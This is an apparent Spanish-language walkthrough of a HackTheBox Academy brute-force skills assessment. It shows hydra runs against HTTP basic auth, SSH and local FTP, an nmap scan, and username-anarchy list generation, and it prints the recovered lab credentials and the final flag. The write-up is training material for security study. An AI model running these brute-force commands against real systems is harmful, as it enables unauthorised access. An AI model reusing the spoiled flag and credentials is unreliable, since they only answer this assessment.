{"url":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520","machine":{"name":"Skills Assessment - Brute Force","slug":"skills-assessment-brute-force","platform":"HackTheBox","platform_slug":"hackthebox","difficulty":"muy_facil","difficulty_label":"Muy fácil","operating_system":["Linux"],"tags":["brute-force","web","hydra","ssh","ftp","linux"],"original_url":"https://academy.hackthebox.com/app/module/57/section/515"},"author":{"nickname":"juanluismm520","url":"https://www.writeups.es/u/juanluismm520","bio":null},"summary":"Debemos atacar dos laboratorios relacionados en los que debemos explotar ataques de fuerza bruta a partir de diccionarios dados.","outline":[{"level":1,"title":"Parte 1","anchor":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520#parte-1"},{"level":2,"title":"Descarga de diccionarios","anchor":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520#descarga-de-diccionarios"},{"level":2,"title":"Explotación","anchor":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520#explotacion"},{"level":1,"title":"Parte 2","anchor":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520#parte-2"},{"level":2,"title":"Identificación del servicio","anchor":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520#identificacion-del-servicio"},{"level":2,"title":"Explotación","anchor":"https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520#explotacion-2"}],"cves":[],"code_languages":["bash"],"stats":{"words":244,"reading_minutes":1,"votes":0},"content_markdown":"# Parte 1\n## Descarga de diccionarios\nHTB nos manda dos diccionarios para usar. Los podemos descargar usando `curl`\n```bash\ncurl -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/top-usernames-shortlist.txt\ncurl -O https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/2023-200_most_used_passwords.txt\n\n```\n\n## Explotación\nCuando entramos a la IP:PORT dada por HTB nos lleva a un auth login sencillo, usamos hydra con el módulo http-get\n```bash\nhydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt 154.57.164.77 http-get / -s 33183 -t 64\n```\nDonde `-s` es el puerto que nos da HTB y `-t` lo usamos para que vaya de forma más rápida. \n\nNos salen las credenciales \n> [!SPOILER]\n> admin:Admin123\n> ![Imagen](https://heqkdeabwizixwftdumf.supabase.co/storage/v1/object/public/writeup-images/318f5db5-2777-441d-bccc-080db9bfff1e/bc9f0427-3f85-4433-997a-67e6ac28652f.webp)\n>\n> El usuario que necesitaremos para la parte dos es: `satwossh`\n\nEn el spoiler podemos ver como hemos conseguido entrar. \n\n\n# Parte 2\n## Identificación del servicio\nBásicamente nos da otra dirección ip y puerto. Si hacemos un nmap estamos ante un ssh. \n```bash\n┌─[eu-academy-5]─[10.10.14.177]─[htb-ac-2334078@htb-4oit61rhs6]─[~]\n└──╼ [★]$ nmap -sV 154.57.164.77 -p 32690 -Pn \nStarting Nmap 7.95 ( https://nmap.org ) at 2026-09-06 10:43 EDT\nNmap scan report for 154-57-164-77.static.isp.htb.systems (154.57.164.77)\nHost is up (0.0067s latency).\n\nPORT      STATE SERVICE VERSION\n32690/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n\n```\n\nDebemos hacer fuerza bruta a ssh usando el usuario conseguido anteriormente. \n\n## Explotación\n```bash\nhydra -l spoiler -P passwords.txt 154.57.164.77 ssh -s 32690 -t 64 -f \n```\n\nNos dará la contraseña\n> [!SPOILER]\n> [32690][ssh] host: 154.57.164.77   login: satwossh   password: password1\n\nNos metemos por ssh\n```bash\nssh spoiler@154.57.164.77 -p 32690\n```\n\n\nUna vez dentro tenemos lo siguiente:\n![Imagen](https://heqkdeabwizixwftdumf.supabase.co/storage/v1/object/public/writeup-images/318f5db5-2777-441d-bccc-080db9bfff1e/24acdb9b-f8f6-4c3b-8a17-208554b764a8.webp)\n\nComo vemos parece que hay que usar la herramienta username-anarchy y el diccionario passwords. Además nos dice que hay un usuario que ha tenido problemas con el ftp (**_Thomas Smith_**). No solo eso sino que tenemos `hydra` en la máquina a la que estamos conectados por ssh.\n\nPara crear el diccionarios con username anarchy es extremadamente sencillo. \n```bash\n./username-anarchy Thomas Smith > thomas.txt\n```\nCon eso ya tendremos el diccionario y procedemos a usar hydra al servicio ftp de localhost. Para comprobar que está abierto simplemente con `netstat -tulnp` podemos verificarlo. \n\n```bash\nhydra -L thomas.txt -P passwords.txt ftp 127.0.0.1 -t 64 -f\n```\n\n> [!SPOILER]\n> [21][ftp] host: 127.0.0.1   login: thomas   password: chocolate!\n\nUna vez tengamos las credenciales ejecutamos estos comandos para sacar la flag\n```bash\nftp localhost\n(Introducimos usuario y contraseña)\nls\nget flag.txt\nbye\ncat flag.txt\n```\n\nObteniendo así:\n> [!SPOILER]\n> flag.txt: HTB{brut3f0rc1ng_succ3ssful}","published_at":"2026-09-03T15:19:58.866865+00:00","updated_at":"2026-09-06T16:15:58.893562+00:00","license":"CC BY-SA 4.0","attribution":"Writeup de juanluismm520 publicado en writeups.es — https://www.writeups.es/writeups/hackthebox/skills-assessment-brute-force/juanluismm520"}